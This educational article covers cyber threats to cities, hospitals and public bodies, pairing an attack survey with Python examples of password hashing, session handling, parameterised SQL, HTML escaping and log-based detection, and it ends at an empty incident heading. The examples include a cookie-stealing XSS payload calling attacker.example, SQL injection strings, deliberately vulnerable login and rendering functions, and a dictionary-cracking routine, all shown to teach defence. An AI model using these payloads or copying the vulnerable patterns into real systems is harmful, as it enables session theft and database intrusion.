Cybersecurity and cities, hospitals, public bodies: how to secure your IT infrastructure and avoid cyberattacks?

SURPLIE Alexis

Mobility expert


Understanding the challenges of cybersecurity is essential to protect the critical infrastructures of cities, hospitals and public bodies. Cybersecurity plays a crucial role in preserving essential services and protecting citizens’ sensitive data.

In January 2020 alone, there were reportedly as many crypto-ransomware attacks as in the whole of 2019, and the cost of cybercrime to the global economy has been estimated at $2 trillion, up from $400 billion in 2015. With cyber-attacks on the rise, it is imperative to adopt robust measures to secure these vital institutions.

I- What types of cyberattack are there?

The ransomware attack

Ransomware is malware that encrypts the victim's files, or locks the systems outright, and demands payment in exchange for the decryption key. Most current operators also exfiltrate data before encrypting it and threaten to publish it if the ransom is not paid (so-called double extortion), which means a good backup alone no longer makes the attack harmless. Paying does not guarantee recovery, and French public bodies are instructed not to pay.

Password attack

Passwords remain the access control of choice for most organizations, so discovering a target's password is an attractive proposition for an attacker. Several methods are used. People often keep copies of their passwords on pieces of paper or sticky notes on or around their desks, where an attacker can read them or pay someone inside to do so. Passwords can be guessed online (brute force, or password spraying, which tries a few common passwords against many accounts to stay under lockout thresholds), captured by intercepting unencrypted network traffic, or recovered offline from a stolen database if they were stored with a fast, unsalted hash. Passwords reused across services and leaked in one breach are then replayed against others (credential stuffing).
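As an added example (not code from the original article), the following Python shows both sides of the offline half of this attack: a leaked table of unsalted SHA-256 hashes falls to a single dictionary lookup that serves every account at once, while the same passwords stored with a per-user salt and a deliberately slow key-derivation function (PBKDF2-HMAC-SHA256 at the 600,000 iterations OWASP currently recommends) must be attacked one account at a time at real CPU cost. The wordlist, usernames and passwords are constructed for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for a real cracking dictionary
# (assumption: the attacker holds a list of common passwords).
COMMON_PASSWORDS = ["123456", "password", "hopital2020", "Paris75!", "admin", "welcome1"]

# OWASP's current figure for PBKDF2-HMAC-SHA256; the cost per guess is the point.
PBKDF2_ITERATIONS = 600_000


def unsalted_sha256(password: str) -> str:
    """The weak scheme: fast and unsalted, so identical passwords give identical hashes."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_unsalted(stored: dict, wordlist: list) -> dict:
    """Offline dictionary attack on a leaked table of unsalted SHA-256 hashes.

    One precomputed table serves every account at once: each candidate word is
    hashed a single time and looked up against all users. Returns
    {username: recovered_password} for every account that fell.
    """
    table = {unsalted_sha256(word): word for word in wordlist}
    return {user: table[digest] for user, digest in stored.items() if digest in table}


def hash_password(password: str, salt: bytes = None) -> str:
    """The hardened scheme: per-user random salt plus a deliberately slow KDF.

    The salt kills the shared-table shortcut (every account must be attacked on
    its own) and the iteration count makes each guess cost real CPU time.
    Stored as "<salt-hex>$<derived-key-hex>".
    """
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"{salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and compare in constant time (no timing leak)."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    # Constructed leaked table: two users chose dictionary words, one did not.
    leaked = {
        "alice": unsalted_sha256("password"),
        "bob": unsalted_sha256("hopital2020"),
        "carol": unsalted_sha256("x7#Qm!v9Lp2@wR"),
    }
    print("recovered from unsalted table:", crack_unsalted(leaked, COMMON_PASSWORDS))
    record = hash_password("hopital2020")
    print("login with right password:", verify_password("hopital2020", record))
    print("login with wrong password:", verify_password("password", record))
```

Note that the salt does not stop an attacker from guessing one weak password; it only removes the shortcut of attacking all accounts with one table. The iteration count is what makes each guess expensive, and it should be raised as hardware gets faster.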

Malware

Malware is malicious software that infects a system and alters its operation: programs or code designed to infect, damage or gain access to computer systems. There are many families of malware (viruses, worms, trojans, spyware, ransomware), each infecting and disrupting devices in its own way, but all of them are designed to compromise the confidentiality, integrity or availability of the systems they reach.

Denial of service (DoS) and distributed denial of service (DDoS) attacks

A denial-of-service (DoS) attack is designed to overwhelm a system's resources (bandwidth, connections, CPU, memory) until it can no longer respond to legitimate requests. A distributed denial-of-service (DDoS) attack has the same aim, but the traffic comes from a large number of hosts: typically machines infected with malware and controlled by the attacker as a botnet, or third-party servers abused to reflect and amplify the attacker's traffic. The name comes from the effect: the site under attack is unable to provide its service to those who want to use it.

Phishing and spear phishing

A phishing attack occurs when an attacker sends e-mails that appear to come from reliable, legitimate sources in an attempt to obtain sensitive information from the target, or to get the target to open an attachment or follow a link. Phishing combines social engineering and technology and is so called because the attacker is, in effect, “fishing” for access to a restricted area using the “bait” of an apparently trustworthy sender.

Spear phishing is a more targeted form of phishing. The attacker takes the time to research the targets, then writes messages they are likely to find relevant. These attacks are aptly named “spear” phishing because the attacker focuses on a specific target. The message looks legitimate, which is why a spear-phishing attack can be hard to spot.

Whale phishing

A whale-phishing (whaling) attack is so named because it targets an organization's “big fish” or “whales”: top executives, senior management or others at a high level in the organization. These people are likely to hold information valuable to attackers, such as proprietary information about the company or its operations, and their authority makes fraudulent instructions sent in their name (a payment to change, a file to release) more credible to staff.

MITM attack

Man-in-the-middle (MITM) attacks allow an attacker to eavesdrop on, and often alter, data exchanged between two people, networks or computers. The name comes from the attacker positioning themselves between the two parties trying to communicate, relaying traffic so that each side believes it is talking directly to the other. Typical entry points are rogue or compromised Wi-Fi access points, ARP or DNS spoofing on a local network, and clients that accept an unverified TLS certificate. Properly validated TLS is the main defence: an attacker who cannot present a certificate trusted by the client cannot silently relay the encrypted session.

Session hijacking

Session hijacking is one of many forms of MITM attack. Once a user has authenticated, the server identifies the rest of the session by a session token, usually a cookie. If the attacker obtains that token (by sniffing it from unencrypted traffic, stealing it through a script injected into the page, or guessing it when tokens are predictable), they can present it themselves, and the server continues the session without suspecting that it is now talking to the attacker instead of the client. Older variants at the network layer spoof the client's IP address and TCP sequence numbers to take over a connection. The attack works because the server trusts the token (or address) as proof of identity and is already engaged in an approved connection, so nothing prompts it to re-check who is on the other end.
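The following Python is an added example, not code from the article, showing the server-side measures that make a hijacked or planted session token hard to obtain and short-lived if obtained: tokens drawn from the OS random source, a server-side table with expiry, token rotation at login (against session fixation), and a Set-Cookie header whose attributes close the sniffing and script-theft paths. The cookie name `sid` and the 15-minute lifetime are assumptions.

```python
import secrets
import time
from http.cookies import SimpleCookie

SESSION_TTL_SECONDS = 15 * 60  # assumption: idle sessions die after 15 minutes


class SessionStore:
    """Server-side session table keyed by an unguessable token.

    The token is the only thing that identifies the session after login, so its
    secrecy and unpredictability are what stand between the user and a hijacker.
    """

    def __init__(self):
        self._sessions = {}  # token -> {"user": str, "expires": float}

    def create(self, user: str, now: float = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG: not guessable
        self._sessions[token] = {"user": user, "expires": now + SESSION_TTL_SECONDS}
        return token

    def lookup(self, token: str, now: float = None):
        """Return the user bound to this token, or None if unknown or expired."""
        now = time.time() if now is None else now
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if entry["expires"] < now:
            del self._sessions[token]  # expired: a stolen token has a short shelf life
            return None
        return entry["user"]

    def rotate(self, old_token: str, now: float = None):
        """Issue a fresh token and kill the old one (do this at login and privilege changes).

        This defeats session fixation, where the attacker plants a token they already
        know and waits for the victim to authenticate with it.
        """
        user = self.lookup(old_token, now)
        if user is None:
            return None
        del self._sessions[old_token]
        return self.create(user, now)

    def revoke(self, token: str) -> None:
        """Logout: forget the token so a copy taken earlier is worthless."""
        self._sessions.pop(token, None)


def session_cookie_header(token: str) -> str:
    """Build the Set-Cookie header that closes the common theft paths."""
    cookie = SimpleCookie()
    cookie["sid"] = token
    cookie["sid"]["secure"] = True        # TLS only: sniffing on the network yields nothing
    cookie["sid"]["httponly"] = True      # invisible to JavaScript: an XSS cannot read it
    cookie["sid"]["samesite"] = "Strict"  # not sent on cross-site requests (CSRF)
    cookie["sid"]["path"] = "/"
    cookie["sid"]["max-age"] = SESSION_TTL_SECONDS
    return cookie.output()


if __name__ == "__main__":
    store = SessionStore()
    pre_login = store.create("anonymous")
    sid = store.rotate(pre_login)  # new identifier once the user has authenticated
    print(session_cookie_header(sid))
    print("old token still valid?", store.lookup(pre_login) is not None)
```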

SQL injection attack

SQL injection is a common way of exploiting websites that use databases to serve their users. The application builds an SQL query from input supplied by the client (a login name, a password, a search term) by concatenating that input into the query text. Because the input becomes part of the command itself rather than being handled as data, an attacker can submit input containing SQL syntax, which the database server then executes: authentication checks are bypassed, tables are read or modified, and on some servers commands are run on the host. The fix is to keep the query text fixed and pass input only through bound parameters.
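As an added example (not from the original article), here is the attack and its fix side by side in Python with SQLite: a login query built by string formatting accepts `admin' --` as a username and lets the attacker in without a password, while the same query with bound parameters treats the payload as an ordinary (non-existent) username. The table, accounts and stored hash strings are constructed.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a municipal portal's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL, role TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "hash-of-admin-secret", "administrator"),
         ("agent42", "hash-of-agent42-secret", "clerk")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str):
    """DELIBERATELY VULNERABLE: the user's input becomes part of the SQL program."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str):
    """Parameterised query: the SQL text is fixed, input travels only as data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchone()


if __name__ == "__main__":
    conn = make_demo_db()
    # Payload 1: a comment marker throws away the password check entirely.
    print("vulnerable, admin' --  :", login_vulnerable(conn, "admin' --", "anything"))
    print("safe,       admin' --  :", login_safe(conn, "admin' --", "anything"))
    # Payload 2: a tautology makes the WHERE clause true for every row.
    print("vulnerable, tautology  :", login_vulnerable(conn, "x' OR '1'='1", "x' OR '1'='1"))
    print("safe,       tautology  :", login_safe(conn, "x' OR '1'='1", "x' OR '1'='1"))
    print("safe, real credentials :", login_safe(conn, "admin", "hash-of-admin-secret"))
```

In a real application the password check would compare a salted, slow hash rather than a stored string; the point here is only where the input ends up, in the query text or in a parameter.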

DNS spoofing

With DNS spoofing (also called DNS cache poisoning), an attacker injects forged DNS answers, or alters DNS records at a resolver or registrar, so that a legitimate domain name resolves to an address the attacker controls. Once on the fraudulent site, the victim may enter sensitive information that the attacker uses or sells. The attacker can also put up a poor-quality site with derogatory or inflammatory content to damage the image of the organization whose name was hijacked. DNSSEC-validated resolution and HTTPS with certificate checking limit what a spoofed answer can achieve.

Web attacks

Web attacks target vulnerabilities in web applications. Every time you enter information in a web application, you send a request that the application turns into actions and a response. For example, when you send money through an online banking application, the data you enter tells the application to access your account, debit it and credit someone else's. Attackers craft or tamper with these requests (parameters, cookies, headers, uploaded files) so that the application does something its developers did not intend.

Insider threat

Sometimes, the most dangerous actors come from within the organization. Individuals within a company present a particular danger, as they usually have access to various systems and, in some cases, administrative privileges that enable them to make critical changes to the system or its security rules.

Trojans or Trojan horses

A Trojan attack uses a malicious program hidden inside an apparently legitimate program. When the user runs the supposedly innocent program, the malware inside the trojan can be used to open a backdoor in the system through which hackers can penetrate the computer or network. This threat takes its name from the story of the Greek soldiers who hid inside a horse to infiltrate the city of Troy and win the war. Once the “gift” had been accepted and introduced inside the gates of Troy, the Greek soldiers came out and attacked. Similarly, an unsuspecting user may welcome an innocent-looking application onto their system, only to introduce a hidden threat.

Drive-by attacks

In a drive-by attack, an attacker plants malicious code on a poorly secured website (or in an advertisement served on it). When a user visits the page, the script runs in the browser and exploits a vulnerability in the browser, a plug-in or the operating system to install malware. The “drive-by” name comes from the fact that the victim only needs to pass through the site by visiting it in order to be infected; there is no need to click anything or enter any information. Keeping browsers and plug-ins patched is the main defence, since the attack depends on an exploitable flaw.

XSS attacks

With cross-site scripting (XSS), the attacker gets a script of their choosing to run in the victim's browser in the context of a trusted web application: either by sending the victim a crafted link whose parameters are reflected unescaped into the page (reflected XSS), or by storing the script in data the application later displays to other users, such as a comment or profile field (stored XSS). Because the script runs with the origin of the legitimate site, it can read what that site can (session cookies not marked HttpOnly, page content, anti-CSRF tokens) and issue requests that the application treats as the logged-in user's own actions. Output encoding appropriate to the HTML context, backed by a Content Security Policy, is the defence.
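The following Python is an added example, not the article's code, showing a stored-XSS shape and its fix: a comment renderer that drops user input straight into HTML lets a script tag and an attribute break-out through, while the same renderer with context-appropriate escaping produces inert markup. A small parser built on the standard library's `HTMLParser` checks the result the way a browser would tokenize it, and a CSP header is shown as the second layer. The payloads and the markup template are constructed.

```python
import html
from html.parser import HTMLParser


def render_comment_vulnerable(author: str, body: str) -> str:
    """DELIBERATELY VULNERABLE: user-supplied strings dropped straight into the HTML."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Encode for the HTML context; quote=True also neutralises attribute break-outs."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


def csp_header() -> str:
    """Defence in depth: if an escape is ever missed, the browser still refuses inline script."""
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


class ActiveContentFinder(HTMLParser):
    """Tokenizes markup as a browser would and reports anything that executes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):  # onload, onerror, onmouseover, ...
                self.findings.append(f"event handler {name}")


def active_content(markup: str) -> list:
    """Return the executable constructs found in `markup` (an empty list means inert)."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


# Constructed stored-XSS payloads: a script in the comment body, and an author name
# that closes the attribute early and adds an event handler.
PAYLOAD_BODY = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
PAYLOAD_AUTHOR = '" onmouseover="alert(document.cookie)'


if __name__ == "__main__":
    for label, render in (("vulnerable", render_comment_vulnerable), ("safe", render_comment_safe)):
        markup = render(PAYLOAD_AUTHOR, PAYLOAD_BODY)
        print(f"{label}: {markup}")
        print(f"  executable content: {active_content(markup) or 'none'}")
    print(csp_header())
```

Escaping is context-dependent: `html.escape` is right for text nodes and quoted attribute values, but a value placed inside a `<script>` block, a URL or a CSS property needs the encoding for that context instead.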

Eavesdropping attacks

Eavesdropping attacks involve the perpetrator intercepting traffic as it crosses the network. In this way an attacker can collect usernames, passwords and other confidential information such as credit card details. Eavesdropping can be passive (the attacker only listens, for example on an open Wi-Fi network or a mirrored switch port) or active (the attacker inserts themselves into the path, as in an MITM attack, and may modify traffic). Encrypting traffic end to end is the only reliable protection against the passive form, which leaves no trace on the network.

Birthday attack

A birthday attack exploits a property of the hash functions used in digital signatures and message authentication: a signature covers the hash of the message rather than the message itself, so any two messages with the same hash carry the same valid signature. By the birthday paradox, finding some pair of colliding messages costs roughly 2^(n/2) hash evaluations for an n-bit hash, far fewer than the 2^n needed to match one specific hash. An attacker therefore prepares many harmless variants of a document and many malicious ones, finds a harmless/malicious pair with the same hash, gets the victim to sign the harmless one, and then attaches that signature to the malicious one; the recipient accepts it because the hash checks out. This is why hash output must be long (SHA-256 gives 128-bit collision resistance) and why MD5 and SHA-1, for which collisions are practical, must not be used in signatures.
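As an added example (not from the article), the Python below makes the 2^(n/2) versus 2^n gap concrete: it computes the birthday bound for a given hash length, then finds a real collision on SHA-256 truncated to 32 bits in roughly 77,000 hashes, where a preimage search against one specific 32-bit digest would need on the order of 4 billion. Truncation is only there to make the search run in seconds; the messages are constructed.

```python
import hashlib
import math


def truncated_hash(message: bytes, bits: int) -> int:
    """SHA-256 cut down to `bits` bits, so the search space is small enough to demonstrate."""
    digest = hashlib.sha256(message).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def birthday_bound(bits: int, probability: float = 0.5) -> int:
    """Number of random messages needed for a collision with the given probability.

    From the birthday paradox: n ~ sqrt(2 * 2^bits * ln(1 / (1 - p))).
    For p = 0.5 this is about 1.18 * 2^(bits/2), versus 2^bits for a preimage.
    """
    return math.ceil(math.sqrt(2 * (2 ** bits) * math.log(1 / (1 - probability))))


def find_collision(bits: int, max_tries: int = 2_000_000):
    """Generic birthday search: hash distinct messages until two share a truncated digest.

    Memory holds every digest seen so far; work is ~2^(bits/2), not 2^bits.
    Returns (message_a, message_b) with a != b and equal truncated hashes, or None.
    """
    seen = {}
    for i in range(max_tries):
        msg = f"contract-v{i}".encode()  # constructed: distinct, benign-looking variants
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg
        seen[h] = msg
    return None


def preimage_tries(target_hash: int, bits: int, max_tries: int) -> int:
    """Contrast: hunting for a message with one *specific* digest scales as 2^bits.

    Returns the number of attempts needed, or -1 if max_tries was exhausted.
    """
    for i in range(max_tries):
        if truncated_hash(f"probe-{i}".encode(), bits) == target_hash:
            return i + 1
    return -1


if __name__ == "__main__":
    bits = 32
    print(f"{bits}-bit hash: ~{birthday_bound(bits)} messages for a 50% collision, "
          f"vs ~{2 ** bits} for a preimage")
    a, b = find_collision(bits)
    print("collision:", a, b, hex(truncated_hash(a, bits)), hex(truncated_hash(b, bits)))
    # Preimage is only feasible here at a much shorter length.
    target = truncated_hash(b"target-document", 12)
    print("12-bit preimage found after", preimage_tries(target, 12, 200_000), "tries")
```

Scaling the numbers up is the whole argument: at 128 bits the birthday bound is about 2^64 hashes, which is why 128-bit digests such as MD5 were never adequate against a motivated attacker, and 256-bit digests are the floor for signatures.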

II- Cybersecurity in cities

Securing critical infrastructures

Network and System Protection

Critical infrastructures such as communication networks, transportation systems, water management and power grids are the backbone of modern city operations. As smart-city development tends towards hyperconnectivity, systems communicate with each other and are open. This creates a larger and more complex attack surface, linked to 5G and IoT devices, which demands stronger security. City systems such as video-protection cameras and traffic lights can themselves become the target of cyberattacks.

These numerous entry points make it possible for unauthorized parties to gain access. The smart city suffers from a lack of cybersecurity, especially where urban mobility equipment is concerned, and has thus become a “royal road” for cybercrime. As industrial systems are connected, the risk of cyber-attack grows, not least because of the more complex structure of the IT infrastructure. The threat of internal breaches and cyber-attacks has therefore increased over the years.

For reference, ransomware became the most significant threat to the transport sector in 2022, with its share of attacks almost doubling from 13% in 2021 to 25% in 2022.

Securing smart city and citizen data

The information gathered in the field by these systems is of paramount importance, since it is this information that drives the smart city: it supports decision-making, communication and event planning, among other things. Improperly collected or processed data can lead to errors or operational malfunctions in the systems and services concerned. Both the confidentiality and the integrity of this data must therefore be protected throughout collection, processing and storage.

Citizen data, including personal information and data from online municipal services, must be secured to prevent misuse and identity theft. Today, attacks can target self-service charging stations, bike-sharing terminals or scooters, with the aim of stealing users’ personal data and banking information.

Ageing installations, an additional risk factor

Institutions are often vulnerable because of ageing IT infrastructures and a lack of dedicated cybersecurity resources. Cyber attacks can disrupt essential services, leak data and damage public confidence. For example, DIASER, the protocol that lets traffic-light controllers communicate with each other, offers little security.

How can cybersecurity be strengthened for cities and public bodies?

Preventive measures: collaboration with cybersecurity experts, standards and security by design

Enhanced cybersecurity can take many forms. It can be driven by standards and regulation, for example ISO/IEC 27001, GDPR (RGPD in French) or the PCI DSS data security standard, which the card brands require of any organization that stores, processes or transmits payment card data such as Visa or Mastercard. Prevention also means raising awareness among public-sector players, who may lack information and knowledge on the subject. ANSSI publishes guides to good cybersecurity practice.

This can be achieved by working with cybersecurity experts who will support, audit and advise players in creating or optimizing the cybersecurity of their systems and infrastructures.

Finally, security by design is a measure that is becoming increasingly widespread. It refers to a product, such as software, in which security and the notion of risk are at the heart of the design: threats are modelled, secure defaults are chosen and risky features are left out before the product is built. This approach improves the security of the product, protects it from potential threats and reduces the risk of vulnerabilities. The idea is no longer to reinforce a system only after a failure, as was previously the case, but to prevent the risks upstream. Many of today's software products and systems now incorporate security and risk into their design in this way.

Technological solutions to counter cyber attacks?

In addition to traditional controls such as firewalls, VPNs, anti-virus, anti-spam, anti-DDoS services and data encryption, there are now more effective tools against increasingly inventive cybercriminals. Intrusion detection systems (IDS) monitor network traffic and hosts for known malicious activity, suspicious behaviour or violations of security policy and raise alerts; intrusion prevention systems (IPS) sit inline and can also block the traffic they match.

Security Information and Event Management (SIEM) software collects logs and security events from across the IT environment (firewalls, servers, endpoints, identity systems), normalizes them, and correlates them against detection rules to identify, categorize and prioritize incidents. This gives SOC (security operations center) teams a global, centralized view of their information systems' activity; the quality of that view depends on which sources are fed in and how well the rules are tuned.
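As an added example (not from the article), here is the kind of correlation a SIEM rule performs, written out in Python over a few constructed sshd-style syslog lines for a hypothetical host: the parser normalizes the raw lines into events, and three sliding-window rules flag a brute-force burst, a password spray across several accounts, and, most importantly, a successful login from a source that was already flagged. The log lines, host name, addresses and thresholds are all constructed; syslog lines carry no year, so one is assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style log lines for a hypothetical host "portail"; not captured
# from any real system. One source tries six accounts in ten seconds and then logs
# in; a second source mistypes a password twice, which is normal user behaviour.
SAMPLE_LOG = """\
Mar  3 08:00:01 portail sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51012 ssh2
Mar  3 08:00:03 portail sshd[2203]: Failed password for invalid user test from 203.0.113.7 port 51013 ssh2
Mar  3 08:00:05 portail sshd[2205]: Failed password for root from 203.0.113.7 port 51014 ssh2
Mar  3 08:00:07 portail sshd[2207]: Failed password for invalid user oracle from 203.0.113.7 port 51015 ssh2
Mar  3 08:00:09 portail sshd[2209]: Failed password for invalid user postgres from 203.0.113.7 port 51016 ssh2
Mar  3 08:00:11 portail sshd[2211]: Failed password for jdupont from 203.0.113.7 port 51017 ssh2
Mar  3 08:00:40 portail sshd[2215]: Accepted password for jdupont from 203.0.113.7 port 51018 ssh2
Mar  3 08:02:10 portail sshd[2230]: Failed password for mbernard from 198.51.100.23 port 40022 ssh2
Mar  3 08:02:15 portail sshd[2231]: Failed password for mbernard from 198.51.100.23 port 40023 ssh2
Mar  3 08:02:22 portail sshd[2232]: Accepted password for mbernard from 198.51.100.23 port 40024 ssh2
Mar  3 09:15:00 portail sshd[2300]: Accepted publickey for backup from 192.0.2.44 port 33000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse(log_text: str, year: int = 2024) -> list:
    """Normalise raw syslog lines into events. Syslog omits the year, so it is assumed."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # a real pipeline would count unparsed lines; here they are skipped
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return events


def detect(events: list, window: timedelta = timedelta(minutes=5),
           fail_threshold: int = 5, spray_users: int = 3) -> list:
    """Three correlation rules of the kind a SIEM evaluates over a sliding window.

    brute_force:          >= fail_threshold failures from one IP inside `window`
    password_spray:       one IP failing against >= spray_users distinct accounts
    success_after_attack: an accepted login from an IP already flagged (the alert
                          an analyst must act on first, because the attacker is in)
    """
    recent_failures = defaultdict(list)  # ip -> [(ts, user)] still inside the window
    flagged = set()                      # (ip, rule) pairs already alerted on
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ip = e["ip"]
        if e["result"] == "Failed":
            fails = recent_failures[ip]
            fails.append((e["ts"], e["user"]))
            fails[:] = [(t, u) for t, u in fails if e["ts"] - t <= window]
            users = sorted({u for _, u in fails})
            if len(fails) >= fail_threshold and (ip, "brute_force") not in flagged:
                flagged.add((ip, "brute_force"))
                alerts.append({"rule": "brute_force", "ip": ip, "failures": len(fails), "at": e["ts"]})
            if len(users) >= spray_users and (ip, "password_spray") not in flagged:
                flagged.add((ip, "password_spray"))
                alerts.append({"rule": "password_spray", "ip": ip, "users": users, "at": e["ts"]})
        elif any(flagged_ip == ip for flagged_ip, _ in flagged):
            alerts.append({"rule": "success_after_attack", "ip": ip, "user": e["user"], "at": e["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The thresholds are where tuning happens: too low and every user who forgets a password pages the SOC, too high and a slow spray that stays under the lockout policy is never seen. A production rule would also key the spray rule on the target account across many source addresses, since sprays are routinely spread over a botnet.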

The Zero Trust approach

To understand Zero Trust architecture, think first of traditional security architecture: once someone has logged on at work, they can access the entire corporate network. This protects only the perimeter of an organization and is linked to the physical office premises. This model doesn’t support remote working and exposes the organization to risk, because if someone steals a password, they can access everything.

Instead of just protecting an organization's perimeter, Zero Trust architecture protects every file, e-mail and network by authenticating every identity and every device on every access (which is why it is also called “perimeterless security”). Rather than simply securing a network, Zero Trust also secures remote access, personal devices and third-party applications. It rests on three principles: verify explicitly, use least-privilege access, and assume breach.

III- Cybersecurity for hospitals: the specificities of hospitals

What are the specific challenges and risks associated with cyber security in hospitals?

Medical data: a sensitive target of choice for cyber attacks

Between the various sites that make up our healthcare ecosystem (analysis laboratories, hospitals in the same group, equipment/drug production plants, etc.), exchanges are continuous and their data extremely sensitive. Test results, prescriptions in patient files, drug manufacturing secrets… the information exchanged is not trivial.

And it’s not just a question of confidentiality or medical secrecy. To be sure of making the right diagnosis and administering the right dosage, healthcare professionals need to be able to rely on the integrity of the information on which they base their decisions.

The Risks of Cyberattacks for Patients

Cyber attacks can paralyze hospital IT systems, interrupting essential services and delaying treatment, with serious or even fatal consequences for patients. Essential equipment such as operating theatres, scanners, MRIs and care assistance equipment are all targets that can become out of use, compromising patient care.

What’s more, connected medical devices such as infusion pumps and cardiac monitors are vulnerable to cyber-attacks, risking life-threatening malfunctions. Cybersecurity in the medical field is therefore crucial to guaranteeing the security, confidentiality and continuity of patient care.

The Vulnerability of Healthcare Systems to cyber attacks

New equipment, telemedicine, interconnected healthcare systems and services, as well as the Internet of Things (IoT), are taking up more and more space in a wide range of devices (pacemakers, insulin pumps, etc.), generating huge quantities of data that are all targets for hackers. What’s more, the medical act is now connected to the various tools used by the medical profession to transfer data, making hospitals even more vulnerable.

A cyber-attack can not only disrupt the daily lives of professionals, but also jeopardize patient care:

  • Paralyzed biomedical systems
  • Technical platforms unavailable
  • Care scheduling data destroyed
  • Messaging systems down
  • Lost management and human resources data

Strategies for protection against cyber attacks in hospitals

Securing Connected Medical Devices and Data

To prevent such threats, it is essential to implement robust protection measures, such as encryption of transmitted and stored data, multi-factor authentication for device access, and regular software updates to correct vulnerabilities. In addition, network segmentation limits the spread of attacks by isolating critical devices from other systems.

Companies like Stormshield offer solutions such as firewalls certified at the highest European level to secure public infrastructures against cyber-attacks. For example, to protect patient data in transit, the Stormshield Network Security (SNS) product can set up encrypted tunnels using virtual private networks (VPNs).

Training, awareness-raising and assistance from external bodies in the face of cyberattacks: focus on ANSSI

A major player in cybersecurity, ANSSI (Agence Nationale de la Sécurité des Systèmes d’Information) provides expertise and technical assistance to public bodies such as ANS (Agence du Numérique en Santé), as well as to businesses. With a reinforced mission for operators of essential services (OSE), it provides monitoring, detection, warning and response for computer attacks. Faced with the threat to our information systems, the agency’s collective expertise is a guarantee of efficiency. Through CERT Santé, the unit run by ANS for the health sector, 40 GHTs (hospital groupings) have already benefited from the national cyber-surveillance service, and over 800 establishments have been alerted to potential vulnerabilities in their information systems.

CERT Santé :

  • Records information system security incident reports
  • Analyzes and qualifies reports
  • Alerts the appropriate authorities
  • Leads the cyberveille santé community
  • Provides support in responding to incidents
  • Hosts a quarterly webinar on cybersecurity

Another example is the national CaRE (Cybersecurity Acceleration and Resilience of Establishments) program run by the Agence du Numérique en Santé, which is based on 4 key areas: Governance and resilience, resources and pooling, awareness-raising, operational security.

IV. History of 6 major cyber attacks in France

The AP-HP cyber attack

During the summer of 2021, and confirmed by AP-HP on September 12, 2021, a cyber attack affected the hospitals of the Assistance Publique de Paris. The data of 1.4 million people who had taken a Covid screening test in mid-2020 was stolen. This data includes the identity, social security number and contact details of the persons tested, as well as the identity and contact details of the healthcare professionals treating them, and the characteristics and results of the test performed, but does not contain any other medical data.

The hackers did not target the national screening test file (SI-DEP), but “a secure file-sharing service”, used on a one-off basis in September 2020 to transmit contact tracing information to the French National Health Insurance and regional health agencies (ARS).

The cyber attack on Rouen University Hospital

On November 15, 2019, activity at Rouen University Hospital was slowed and paralyzed by a virus that blocked access to most business applications and involved the encryption of files located on workstations and servers, the establishment reports on its own website. The Charles Nicolle Hospital Center is said to have been hit by a ransomware-type virus, i.e. a virus that paralyzes computer systems by infiltrating automated data processing systems (STAD), encoding files with the aim of rendering them unusable by the victim or its services.

As a result, some patients had to be transferred to other facilities, and all scheduled procedures were postponed.

A ransom was demanded to unlock the files: the decryption key was to be bought in bitcoins (making the transaction impossible to reverse once paid). According to 76actu, the ransom amounted to 40 bitcoins, or around 300,000 euros at the exchange rate of the time. E-mail addresses hosted in Russia were given for contacting the attackers after reading the blackmail message displayed on the infected workstations. The university hospital’s communications department stated that it had never intended to pay the ransom, relying instead on its IT staff, supported by ANSSI agents, to restore the systems.

Cyber attack on the Seine-Maritime departmental council

